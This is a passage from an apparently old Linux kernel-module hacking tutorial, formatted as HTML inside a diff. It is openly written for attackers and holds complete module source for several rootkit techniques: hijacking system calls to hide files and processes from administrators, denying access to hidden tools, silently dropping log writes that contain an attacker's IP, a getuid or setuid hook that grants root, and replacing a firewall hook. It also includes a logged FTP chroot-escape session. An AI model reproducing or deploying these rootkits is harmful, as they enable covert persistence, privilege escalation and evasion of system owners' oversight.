+mprotect(0x40000000, 20673, PROT_READ|PROT_EXEC) = 0
+personality(PER_LINUX)                  = 0
+geteuid()                               = 500
+getuid()                                = 500
+getgid()                                = 100
+getegid()                               = 100
+brk(0x804aa48)                          = 0x804aa48
+brk(0x804b000)                          = 0x804b000
+open("/usr/share/locale/locale.alias", O_RDONLY) = 3
+fstat(3, {st_mode=S_IFREG|0644, st_size=2005, ...}) = 0
+mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000
+read(3, "# Locale name alias data base\n#"..., 4096) = 2005
+brk(0x804c000)                          = 0x804c000
+read(3, "", 4096)                       = 0
+close(3)                                = 0
+munmap(0x40008000, 4096)                = 0
+open("/usr/share/i18n/locale.alias", O_RDONLY) = -1 ENOENT (No such file or directory)
+open("/usr/share/locale/de_DE/LC_CTYPE", O_RDONLY) = 3
+fstat(3, {st_mode=S_IFREG|0644, st_size=10399, ...}) = 0
+mmap(0, 10399, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40008000
+close(3)                                = 0
+geteuid()                               = 500
+open("/etc/passwd", O_RDONLY)           = 3
+fstat(3, {st_mode=S_IFREG|0644, st_size=1074, ...}) = 0
+mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000b000
+read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1074
+close(3)                                = 0
+munmap(0x4000b000, 4096)                = 0
+fstat(1, {st_mode=S_IFREG|0644, st_size=2798, ...}) = 0
+mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000b000
+write(1, "r00t\n", 5r00t
+)                   = 5
+_exit(0)                                = ?
+</xmp>
+
+This is a very nice listing of all systamcalls made by the command 'whoami',
+isn't it ? There are  4 interesting systemcalls to intercept in order to
+manipulate the output of 'whoami'
+
+<xmp>
+geteuid()                               = 500
+getuid()                                = 500
+getgid()                                = 100
+getegid()                               = 100
+</xmp>
+
+Take a look at II.6 for an implementation of that problem. This way of analysing
+programs is also very important for a quick look at other standard tools.<br>
+I hope you are now able to find any systemcall which can help you to hide
+yourself or just to backdoor the system, or whatever you want.
+
+<H3><A NAME="II.3."></A>3. Confusing the kernel's System Table</h3>
+
+In II.1 you saw how to access the sys_call_table, which is exported through the
+kernel symbol table. Now think about this... We can modify <i>any</i> exported item
+(functions, structures, variables, for example) by accessing them within our
+module.<br>
+Anything listed in /proc/ksyms can be corrupted. Remember that our module cannot
+be compromised that way, because we don't export any symbols. Here is a little
+excerpt from my /proc/ksyms file, just to show you what you can actually modify.
+
+<xmp>
+...
+001bf1dc ppp_register_compressor
+001bf23c ppp_unregister_compressor
+001e7a10 ppp_crc16_table
+001b9cec slhc_init
+001b9ebc slhc_free
+001baa20 slhc_remember
+001b9f6c slhc_compress
+001ba5dc slhc_uncompress
+001babbc slhc_toss
+001a79f4 register_serial
+001a7b40 unregister_serial
+00109cec dump_thread
+00109c98 dump_fpu
+001c0c90 __do_delay
+001c0c60 down_failed
+001c0c80 down_failed_interruptible
+001c0c70 up_wakeup
+001390dc sock_register
+00139110 sock_unregister
+0013a390 memcpy_fromiovec
+001393c8 sock_setsockopt
+00139640 sock_getsockopt
+001398c8 sk_alloc
+001398f8 sk_free
+00137b88 sock_wake_async
+00139a70 sock_alloc_send_skb
+0013a408 skb_recv_datagram
+0013a580 skb_free_datagram
+0013a5cc skb_copy_datagram
+0013a60c skb_copy_datagram_iovec
+0013a62c datagram_select
+00141480 inet_add_protocol
+001414c0 inet_del_protocol
+001ddd18 rarp_ioctl_hook
+001bade4 init_etherdev
+00140904 ip_rt_route
+001408e4 ip_rt_dev
+00150b84 icmp_send
+00143750 ip_options_compile
+001408c0 ip_rt_put
+0014faa0 arp_send
+0014f5ac arp_bind_cache
+001dd3cc ip_id_count
+0014445c ip_send_check
+00142bc0 ip_forward
+001dd3c4 sysctl_ip_forward
+0013a994 register_netdevice_notifier
+0013a9c8 unregister_netdevice_notifier
+0013ce00 register_net_alias_type
+0013ce4c unregister_net_alias_type
+001bb208 register_netdev
+001bb2e0 unregister_netdev
+001bb090 ether_setup
+0013d1c0 eth_type_trans
+0013d318 eth_copy_and_sum
+0014f164 arp_query
+00139d84 alloc_skb
+00139c90 kfree_skb
+00139f20 skb_clone
+0013a1d0 dev_alloc_skb
+0013a184 dev_kfree_skb
+0013a14c skb_device_unlock
+0013ac20 netif_rx
+0013ae0c dev_tint
+001e6ea0 irq2dev_map
+0013a7a8 dev_add_pack
+0013a7e8 dev_remove_pack
+0013a840 dev_get
+0013b704 dev_ioctl
+0013abfc dev_queue_xmit
+001e79a0 dev_base
+0013a8dc dev_close
+0013ba40 dev_mc_add
+0014f3c8 arp_find
+001b05d8 n_tty_ioctl
+001a7ccc tty_register_ldisc
+0012c8dc kill_fasync
+0014f164 arp_query
+00155ff8 register_ip_masq_app
+0015605c unregister_ip_masq_app
+00156764 ip_masq_skb_replace
+00154e30 ip_masq_new
+00154e64 ip_masq_set_expire
+001ddf80 ip_masq_free_ports
+001ddfdc ip_masq_expire
+001548f0 ip_masq_out_get_2
+001391e8 register_firewall
+00139258 unregister_firewall
+00139318 call_in_firewall
+0013935c call_out_firewall
+001392d4 call_fw_firewall
+...
+</xmp>
+Just look at call_in_firewall, this is a function used by the firewall management
+in the kernel. What would happen if we replace this function with a bogus one ?<br>
+Take a look at the following LKM :
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+
+/*get the exported function*/
+extern int *call_in_firewall;
+
+/*our nonsense call_in_firewall*/
+int new_call_in_firewall()
+{
+ return 0;
+}
+
+int init_module(void)                /*module setup*/
+{
+ call_in_firewall=new_call_in_firewall;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+}
+</xmp>
+Compile / load this LKM and do a 'ipfwadm -I -a deny'. After this do a 'ping 
+127.0.0.1', your kernel will produce a nice error message, because the called
+call_in_firewall(...) function was replaced by a bogus one (you may skip the
+firewall installation in this example).<br>
+This is a quite brutal way of killing an exported symbol. You could also 
+disassemble (using gdb) a certain symbol and modify certain bytes which will
+change the working of that symbol. Imagine there is a IF THEN contruction used
+in an exported function. How about disassembling this function and searching for
+commands like JNZ, JNE, ... This way you would be able to patch important items.
+Of course, you could lookup the functions in the kernel / module sources, but 
+what about symbols you cannot get the source for because you only got a binary
+module. Here the disassembling is quite interesting.<br>
+
+
+<H3><A NAME="II.4."></A>4. Filesystem related Hacks</h3>
+
+The most important feature of LKM hacking is the abilaty to hide some items
+(your exploits, sniffer (+logs), and so on) in the local filesystem.
+
+<H4><A NAME="II.4.1."></A>4.1  How to Hide Files</h4>   
+Imagine how an admin will find your files : He will use 'ls' and see everything.
+For those who don't know it, strace'in through 'ls' will show you that the
+systemcall used for getting directory listings is 
+
+<xmp>
+int sys_getdents (unsigned int fd, struct dirent *dirent, unsigned int count);
+</xmp>
+So we know where to attack.The following piece of code shows the hacked_getdents
+systemcall adapted from AFHRM (from  Michal Zalewski). This module is able to
+hide any file from 'ls' and <i>every</i> program using getdents systemcall.
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+extern void* sys_call_table[];
+
+int (*orig_getdents) (uint, struct dirent *, uint);
+
+int hacked_getdents(unsigned int fd, struct dirent *dirp, unsigned int count)
+{
+ unsigned int tmp, n;
+ int t, proc = 0;
+ struct inode *dinode;
+ struct dirent *dirp2, *dirp3;
+ char hide[]="ourtool";                       /*the file to hide*/
+
+ /*call original getdents -> result is saved in tmp*/
+ tmp = (*orig_getdents) (fd, dirp, count);
+
+ /*directory cache handling*/
+ /*this must be checked because it could be possible that a former getdents
+ put the results into the task process structure's dcache*/
+#ifdef __LINUX_DCACHE_H
+    dinode = current->files->fd[fd]->f_dentry->d_inode;
+#else
+    dinode = current->files->fd[fd]->f_inode;
+#endif
+
+ /*dinode is the inode of the required directory*/
+ if (tmp > 0) 
+ {
+  /*dirp2 is a new dirent structure*/
+  dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);
+  /*copy original dirent structure to dirp2*/
+  memcpy_fromfs(dirp2, dirp, tmp);
+  /*dirp3 points to dirp2*/
+  dirp3 = dirp2;
+  t = tmp;
+  while (t > 0) 
+  {
+   n = dirp3->d_reclen;
+   t -= n;
+   /*check if current filename is the name of the file we want to hide*/
+   if (strstr((char *) &(dirp3->d_name), (char *) &hide) != NULL)
+   {
+    /*modify dirent struct if necessary*/
+    if (t != 0)
+     memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
+    else
+     dirp3->d_off = 1024;
+    tmp -= n;
+   }
+   if (dirp3->d_reclen == 0) 
+   {
+    /*
+     * workaround for some shitty fs drivers that do not properly
+     * feature the getdents syscall.
+    */
+    tmp -= t;
+    t = 0;
+   }
+  if (t != 0)
+   dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);
+  }
+  memcpy_tofs(dirp, dirp2, tmp);
+  kfree(dirp2);
+ }
+ return tmp;
+}
+
+
+int init_module(void)                /*module setup*/
+{
+ orig_getdents=sys_call_table[SYS_getdents];
+ sys_call_table[SYS_getdents]=hacked_getdents;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_getdents]=orig_getdents; 
+                                       
+}
+
+</xmp>
+For beginners : read the comments and use your brain for 10 mins. <br>
+After that continue reading.<br>
+This hack is really helpful. But remember that the admin can see your file by
+directly accessing it. So a 'cat ourtool' or 'ls ourtool' will show him our
+file. So never take any trivial names for your tools like sniffer, mountdxpl.c,
+.... Of course their are ways to prevent an admin from reading our files, just
+read on.<br>
+
+<H4><A NAME="II.4.2."></A>4.2  How to hide the file contents (totally)</h4>
+
+I never saw an implementation really doing this. Of course their are LKMs like
+AFHRM by Michal Zalewski controlling the contents / delete functions  but not
+really hiding the contents. I suppose their are lots of people actually using
+methods like this, but no one wrote on it, so I do.<br>
+It should be clear that there are many ways of doing this. The first way is
+very simple,just intercept an open systemcall checking if filename is 'ourtool'.
+If so deny any open-attempt, so no read / write or whatever is possible. Let's
+implement that LKM :<br>
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+extern void* sys_call_table[];
+
+
+int (*orig_open)(const char *pathname, int flag, mode_t mode);
+
+
+int hacked_open(const char *pathname, int flag, mode_t mode)
+{
+ char *kernel_pathname;
+ char hide[]="ourtool";
+ 
+ /*this is old stuff -> transfer to kernel space*/
+ kernel_pathname = (char*) kmalloc(256, GFP_KERNEL);
+
+ memcpy_fromfs(kernel_pathname, pathname, 255);
+
+ if (strstr(kernel_pathname, (char*)&hide ) != NULL)
+ {
+  kfree(kernel_pathname);
+  /*return error code for 'file does not exist'*/
+  return -ENOENT;
+ }
+ else
+ {
+  kfree(kernel_pathname);
+  /*everything ok, it is not our tool*/
+  return orig_open(pathname, flag, mode);
+ }
+}
+
+
+int init_module(void)                /*module setup*/
+{
+ orig_open=sys_call_table[SYS_open];
+ sys_call_table[SYS_open]=hacked_open;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_open]=orig_open;                                      
+}
+</xmp>
+
+This works very fine, it tells anyone trying to access our files, that they
+are non-existent. But how do we access those files. Well there are many ways
+<ul>
+<li>implement a magic-string<br>
+<li>implement uid or gid check (requires creating a certain account)<br>
+<li>implement a time check<br>
+<li>...<br>
+</ul>
+There are thousands of possibilies which are all very easy to implement, so I
+leave this as an exercise for the reader.
+
+<H4><A NAME="II.4.3."></A>4.3  How to hide certain file parts (a prototype implementation)</h4>
+
+
+Well the method shown in 3.2 is very useful for our own tools / logs. But
+what about modifying admin / other user files. Imagine you want to control
+/var/log/messages for entries concerning your IP address / DNS name. We all
+know thousands of backdoors hiding our identity from any important logfile.
+But what about a LKM just filtering every string (data) written to a file. If 
+this string contains any data concerning our identity (IP address, for example)
+we deny that write (we will just skip it/return). The following implementation
+is a very (!!) basic prototype (!!) LKM, just for showing it. I never saw it
+before, but as in 3.2 there may be some people using this since years.
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+extern void* sys_call_table[];
+
+
+int (*orig_write)(unsigned int fd, char *buf, unsigned int count);
+
+int hacked_write(unsigned int fd, char *buf, unsigned int count)
+{
+ char *kernel_buf;
+ char hide[]="127.0.0.1"; /*the IP address we want to hide*/
+ 
+ kernel_buf = (char*) kmalloc(1000, GFP_KERNEL);
+
+ memcpy_fromfs(kernel_buf, buf, 999);
+
+ if (strstr(kernel_buf, (char*)&hide ) != NULL)
+ {
+  kfree(kernel_buf);
+  /*say the program, we have written 1 byte*/
+  return 1;
+ }
+ else
+ {
+  kfree(kernel_buf);
+  return orig_write(fd, buf, count);
+ }
+}
+
+int init_module(void)                /*module setup*/
+{
+ orig_write=sys_call_table[SYS_write];
+ sys_call_table[SYS_write]=hacked_write;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_write]=orig_write;                                      
+}
+</xmp>
+
+This LKM has several disadvantages, it does not check for the destination it
+the write is used on (can be checked via fd; read on for a sample). This means
+the even a 'echo '127.0.0.1'' will be printed.<br>
+You can also modify the string which should be written, so that it shows an IP
+address of someone you really like... But the general idea should be clear.<br>
+
+<H4><A NAME="II.4.4."></A>4.4  How to redirect / monitor file operations</h4>
+
+
+This idea is old, and was first implemented by Michal Zalewski in AFHRM.
+I won't show any code here, because it is too easy to implemented (after
+showing you II.4.3/II.4.2).There are many things you can monitor by redirection/
+filesystem events :
+<ul>
+<li>someone writes to a file -> copy the contents to another file
+  =>this can be done with sys_write(...) redirection<br>
+<li>someone was able to read a sensitve file -> monitor file reading of certain
+  files<br>
+  =>this can be done with sys_read(...) redirection<br>
+<li>someone opens a file -> we can monitor the whole system for such events<br>
+  =>intercept sys_open(...) and write files opened to a logfile; this is
+  the ways AFHRM monitors the files of a system (see IV.3 for source)<br>
+<li>link / unlink events -> monitor every link created<br>
+  =>intercept sys_link(...) (see IV.3 for source)<br>
+<li>rename events -> monitor every file rename event<br>
+  =>intercept sys_rename(...) (see IV.4 for source)<br>
+<li>...<br>
+</ul>
+These are very interesting points (especially for admins) because you can
+monitor a whole system for file changes. In my opinion it would also be
+interesting to monitor file / directory creations, which use commands like
+'touch' and 'mkdir'.<br>
+The command 'touch' (for example) does <i>not</i> use open for the creation process; 
+a strace shows us the following listing (excerpt) :
+
+<xmp>
+...
+stat("ourtool", 0xbffff798)             = -1 ENOENT (No such file or directory)
+creat("ourtool", 0666)                  = 3
+close(3)                                = 0
+_exit(0)                                = ?
+</xmp>
+
+As you can see the system uses the systemcall sys_creat(..) to create new files.
+I think it is not necessary to present a source,because this task is too trivial
+just intercept sys_creat(...) and write every filename to logfile with
+printk(...).<br>
+This is the way AFHRM logs any important events.
+
+
+<H4><A NAME="II.4.5."></A>4.5  How to avoid any file owner problems</h4>
+
+This hack is not only filesystem related, it is also very important for general
+permission problems. Have a guess which systemcall to intercept.Phrack (plaguez)
+suggests hooking sys_setuid(...) with a magic UID. This means whenever a setuid
+is used with this magic UID, the module will set the UIDs to 0 (SuperUser).<br>
+Let's look at his implementation(I will only show the hacked_setuid systemcall): 
+
+<xmp>
+...
+int hacked_setuid(uid_t uid)
+{
+    int tmp;
+    
+    /*do we have the magic UID (defined in the LKM somewhere before*/
+    if (uid == MAGICUID) {
+    /*if so set all UIDs to 0 (SuperUser)*/
+	current->uid = 0;
+	current->euid = 0;
+	current->gid = 0;
+	current->egid = 0;
+	return 0;
+    }
+    tmp = (*o_setuid) (uid);
+    return tmp;
+}
+...
+</xmp>
+
+I think the following trick could also be very helpful in certain situation.
+Imagine the following situation: You give a bad trojan to an (very silly) admin;
+this trojan installs the following LKM on that system [i did not implement hide
+features, just a prototype of my idea] :<vr>
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+
+extern void* sys_call_table[];
+
+
+int (*orig_getuid)();
+
+int hacked_getuid()
+{
+    int tmp;
+     
+    /*check for our UID*/
+    if (current->uid=500) {
+    /*if its our UID -> this means we log in -> give us a rootshell*/
+    	current->uid = 0;
+	current->euid = 0;
+	current->gid = 0;
+	current->egid = 0;
+	return 0;
+    }
+    tmp = (*orig_getuid) ();
+    return tmp;
+}
+
+
+int init_module(void)                /*module setup*/
+{
+ orig_getuid=sys_call_table[SYS_getuid];
+ sys_call_table[SYS_getuid]=hacked_getuid;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_getuid]=orig_getuid;                                      
+}
+</xmp>
+
+If this LKM is loaded on a system we are only a normal user, login will give us
+a nice rootshell (the current process has SuperUser rights). As I said in part
+I current points to the current task structure.
+
+<H4><A NAME="II.4.6."></A>4.6  How to make a hacker-tools-directory unaccessible</h4>
+
+For hackers it is often important to make the directory they use for their tools
+(<i>advanced</i> hackers don't use the regular local filesystem to store their data).
+Using the getdents approach helped us to hide directory/files. The open approach
+helped us to make our files unaccessible. But how to make our directory
+unaccessible ?<br>
+Well - as always - take a look at include/sys/syscall.h; you should be able to
+figure out SYS_chdir as the systemcall we need (for people who don't believe it
+just strace the 'cd' command...). This time I won't give you any source, because
+you just need to intercept sys_mkdir, and make a string comparison. After this
+you should make a regular call (if it is not our directory) or return ENOTDIR
+(standing for 'there exists no directory with that name'). Now your tools should
+really be hidden from intermediate admins (advanced / paranoid ones will scan
+the HDD at its lowest level, but who is paranoid today besides us ?!). It should
+also be possible to defeat this HDD scan, because everything is based on
+systemcalls.<br>
+
+<H4><A NAME="II.4.7."></A>4.7  How to change CHROOT Environments </h4>
+
+This idea is totally taken from HISPAHACK (hispahack.ccc.de). They published a
+real good text on that theme ('Restricting a restricted FTP'). I will explain
+their idea in some short words. Please note that the following example will
+<i>not</i> work anymore, it is quite old (see wu-ftpd version). I just show
+it in order to explain how you can escape from chroot environments using LKMs.
+The following text is based on old software (wuftpd) so don't try to use it in newer
+wu-ftpd versions, it <i>won't</i> work.<br>
+HISPAHACK's paper is based on the idea of an restricted user FTP account which has the
+following permission layout :<br>
+<xmp>
+drwxr-xr-x     6 user      users      1024 Jun 21 11:26 /home/user/
+drwx--x--x     2 root      root       1024 Jun 21 11:26 /home/user/bin/
+</xmp>
+This scenario (which you can often find) the user (we) can rename the bin
+directory, because it is in our home directory.<br>
+Before doing anything like that let's take a look at whe working of wu.ftpd
+(the server they used for explanation, but the idea is more general). If we
+issue a LIST command ../bin/ls will be executed with UID=0 (EUID=user's uid).
+Before the execution is actually done wu.ftpd will use chroot(...) in order to
+set the process root directory in a way we are restricted to the home directory.
+This prevents us from accessing other parts of the filesystem via our FTP account
+(restricted).<br>
+Now imagine we could replace /bin/ls with another program, this program would
+be executed as root (uid=0). But what would we win, we cannot access the whole
+system because of the chroot(...) call. This is the point where we need a LKM 
+helping us. We remove .../bin/ls with a program which loads a LKM supplied by
+us. This module will intercept the sys_chroot(...) systemcall. It must be
+changed in way it will no more restrict us. <br>
+This means we only need to be sure that sys_chroot(...) is doing nothing. 
+HISPAHACK used a very radical way, they just modified sys_chroot(...) in a way
+it only returns 0 and nothing more. After loading this LKM you can spawn a new
+process without being restricted anymore. This means you can access the whole
+system with uid=0. The following listing shows the example 'Hack-Session'
+published by HISPAHACK :
+
+<xmp>
+thx:~# ftp
+ftp> o ilm
+Connected to ilm.
+220 ilm FTP server (Version wu-2.4(4) Wed Oct 15 16:11:18 PDT 1997) ready.
+Name (ilm:root): user
+331 Password required for user.
+Password:
+230 User user logged in.&nbsp; Access restrictions apply.
+Remote system type is UNIX.
+Using binary mode to transfer files.</TT></PRE>
+ftp> ls
+200 PORT command successful.
+150 Opening ASCII mode data connection for /bin/ls.
+total 5
+drwxr-xr-x  5 user              users                  1024 Jun 21 11:26 .
+drwxr-xr-x  5 user              users                  1024 Jun 21 11:26 ..
+d--x--x--x  2 root              root                   1024 Jun 21 11:26 bin
+drwxr-xr-x  2 root              root                   1024 Jun 21 11:26 etc
+drwxr-xr-x  2 user              users                  1024 Jun 21 11:26 home
+226 Transfer complete.
+ftp> cd ..
+250 CWD command successful.
+ftp> ls
+200 PORT command successful.
+150 Opening ASCII mode data connection for /bin/ls.
+total 5
+drwxr-xr-x  5 user              users                  1024 Jun 21 11:26 .
+drwxr-xr-x  5 user              users                  1024 Jun 21 21:26 ..
+d--x--x--x  2 root              root                   1024 Jun 21 11:26 bin
+drwxr-xr-x  2 root              root                   1024 Jun 21 11:26 etc
+drwxr-xr-x  2 user              users                  1024 Jun 21 11:26 home
+226 Transfer complete.
+ftp> ls bin/ls
+200 PORT command successful.
+150 Opening ASCII mode data connection for /bin/ls.
+---x--x--x  1 root              root                   138008 Jun 21 11:26 bin/ls
+226 Transfer complete.
+ftp> ren bin bin.old
+350 File exists, ready for destination name
+250 RNTO command successful.
+ftp> mkdir bin
+257 MKD command successful.
+ftp> cd bin
+250 CWD command successful.
+ftp> put ls
+226 Transfer complete.
+ftp> put insmod
+226 Transfer complete.
+ftp> put chr.o
+226 Transfer complete.
+ftp> chmod 555 ls
+200 CHMOD command successful.
+ftp> chmod 555 insmod
+200 CHMOD command successful.
+ftp> ls
+200 PORT command successful.
+150 Opening ASCII mode data connection for /bin/ls.
+UID: 0 EUID: 1002
+Cambiando EUID...
+UID: 0 EUID: 0
+Cargando modulo chroot...
+Modulo cargado.
+226 Transfer complete.
+ftp> bye
+221 Goodbye.
+thx:~#
+
+--> now we start a new FTP session without being restricted (LKM is loaded so
+    sys_chroot(...) is defeated. So do what you want (download passwd...)
+</xmp>
+In the Appendix you will find the complete source code for the new ls and the
+module.<br>
+
+<H3><A NAME="II.5."></A>5. Process related Hacks</h3>
+
+So far the filesystem is totally controlled by us.  We discussed the most
+interesting 'Hacks'. Now its time to change the direction. We need to discuss
+LKMs confusing commands like 'ps' showing processes.
+
+<H4><A NAME="II.5.1."></A>5.1 How to hide any process</h4>
+
+The most important thing we need everyday is hiding a process from the admin.
+Imagine a sniffer, cracker (should normally not be done on hacked systems), ...
+seen by an admin when using 'ps'. Oldschool tricks like changing the name of the
+sniffer to something different, and hoping the admin is silly enough, are no good
+for the 21. century. We want to hide the process totally. So lets look at an
+implementation from plaguez (some very minor changes):
+
+<xmp>
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <asm/unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <asm/fcntl.h>
+#include <asm/errno.h>
+#include <linux/types.h>
+#include <linux/dirent.h>
+#include <sys/mman.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include <linux/malloc.h>
+#include <linux/proc_fs.h>
+
+extern void* sys_call_table[];
+
+/*process name we want to hide*/
+char mtroj[] = "my_evil_sniffer";
+
+int (*orig_getdents)(unsigned int fd, struct dirent *dirp, unsigned int count);
+
+/*convert a string to number*/
+int myatoi(char *str)
+{
+ int res = 0;
+ int mul = 1;
+ char *ptr;
+ for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
+  if (*ptr < '0' || *ptr > '9')
+   return (-1);
+  res += (*ptr - '0') * mul;
+  mul *= 10;
+ }
+ return (res);
+}
+
+/*get task structure from PID*/
+struct task_struct *get_task(pid_t pid)
+{
+ struct task_struct *p = current;
+ do {
+  if (p->pid == pid)
+   return p;
+   p = p->next_task;
+  }
+  while (p != current);
+  return NULL;
+}
+
+/*get process name from task structure*/
+static inline char *task_name(struct task_struct *p, char *buf)
+{
+ int i;
+ char *name;
+
+ name = p->comm;
+ i = sizeof(p->comm);
+ do {
+  unsigned char c = *name;
+  name++;
+  i--;
+  *buf = c;
+  if (!c)
+   break;
+  if (c == '\\') {
+   buf[1] = c;
+   buf += 2;
+   continue;
+  }
+  if (c == '\n') {
+   buf[0] = '\\';
+   buf[1] = 'n';
+   buf += 2;
+   continue;
+  }
+  buf++;
+ }
+ while (i);
+ *buf = '\n';
+ return buf + 1;
+}
+
+/*check whether we need to hide this process*/
+int invisible(pid_t pid)
+{
+ struct task_struct *task = get_task(pid);
+ char *buffer;
+ if (task) {
+  buffer = kmalloc(200, GFP_KERNEL);
+  memset(buffer, 0, 200);
+  task_name(task, buffer);
+  if (strstr(buffer, (char *) &mtroj)) {
+   kfree(buffer);
+   return 1;
+  }
+ }
+ return 0;
+}
+
+/*see II.4 for more information on filesystem hacks*/
+int hacked_getdents(unsigned int fd, struct dirent *dirp, unsigned int count)
+{
+ unsigned int tmp, n;
+ int t, proc = 0;
+ struct inode *dinode;
+ struct dirent *dirp2, *dirp3;
+
+ tmp = (*orig_getdents) (fd, dirp, count);
+
+#ifdef __LINUX_DCACHE_H
+ dinode = current->files->fd[fd]->f_dentry->d_inode;
+#else
+ dinode = current->files->fd[fd]->f_inode;
+#endif
+
+ if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i_dev) == 1)
+  proc=1;
+ if (tmp > 0) {
+  dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);
+  memcpy_fromfs(dirp2, dirp, tmp);
+  dirp3 = dirp2;
+  t = tmp;
+  while (t > 0) {
+   n = dirp3->d_reclen;
+   t -= n;
+  if ((proc && invisible(myatoi(dirp3->d_name)))) {
+   if (t != 0)
+    memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
+   else
+    dirp3->d_off = 1024;
+    tmp -= n; 
+   }
+   if (t != 0)
+    dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);
+  }
+  memcpy_tofs(dirp, dirp2, tmp);
+  kfree(dirp2);
+ }
+ return tmp;
+}
+
+
+int init_module(void)                /*module setup*/
+{
+ orig_getdents=sys_call_table[SYS_getdents];
+ sys_call_table[SYS_getdents]=hacked_getdents;
+ return 0;
+}
+
+void cleanup_module(void)            /*module shutdown*/
+{
+ sys_call_table[SYS_getdents]=orig_getdents;                                      
+}
+</xmp>
+
+The code seems complicated, but if you know how 'ps' and every process analyzing
+tool works, it is really easy to understand. Commands like 'ps' do not use any
+special systemcall for getting a list of the current processes (there exists no
+systemcall doing this). By strace'in 'ps' you will recognize that it gets its
+information from the /proc/ directory. There you can find lots of directories
+with names only consisting of numbers. Those numbers are the PIDs of all running
+processes on that system. Inside these directories you find files which provide
+any information on that process.So 'ps' just does an 'ls' on /proc/; every number
+it finds stands for a PID it shows in its well-known listing. The information it
+shows us about every process is gained from reading the files inside /proc/PID/.
+Now you should get the idea.'ps' must read the contents of the /proc/ directory,
+so it must use sys_getdents(...).We just must get the name of the a PID found in
+/proc/; if it is our process name  we want to hide, we will  hide it from /proc/
+(like we did with other files in the filesystem -> see 4.1). The two task
+functions and the invisible(...) function are only used to get the name for a
+given PID found in the proc directory and related stuff. The file hiding should
+be clear after studying 4.1.<br>
+I would improve only one point in plaguez approuch. I don't know why he used
+a selfmade atoi-function, simple_strtoul(...) would be the easier way, but these
+are peanuts. Of course, in a complete hide module you would put file and process
+hiding in one hacked getdents call (this is the way plaguez did it).<br>
+Runar Jensen used another, more complicated way. He also hides the PIDs from the
+/proc directory, but the way he checks whether to hide or not is a bit different.
+He uses the flags field in the task structure. This unsigned long field normally
+uses the following constants to save some information on the task :<br>
+<ul>
+<li>PF_PTRACED   :  current process is observed<br>
+<li>PF_TRACESYS  :  "       "       "  "<br>
+<li>PF_STARTING  :  process is going to start<br>
+<li>PF_EXITING   :  process is going to terminate<br>
+</ul>
+Now Runar Jensen adds his own constant (PF_INVISIBLE) which he uses to indicate
+that the corresponding process should be invisible. So a PID found in /proc by
+using sys_getdents(...) must not be resolved in its name. You only have to check
+for the task flag field. This sounds easier than the 'name approach'. But how to
+set this flag for a process we want to hide. Runar Jensen used the easiest way
+by hooking sys_kill(...). The 'kill' command can send a special code (9 for 
+termination, for example) to any process speciafied by his PID. So start your
+process which is going to be invisible, do a 'ps' for getting its PID. And use
+a 'kill -code PID'. The code field must be a value that is not used by the
+system (so 9 would be a bad choice); Runar Jensen took 32. So the module needs
+to hook sys_kill(...) and check for a code of 32. If so it must set the task
+flags field of the process specified through the PID given to sys_kill(...).
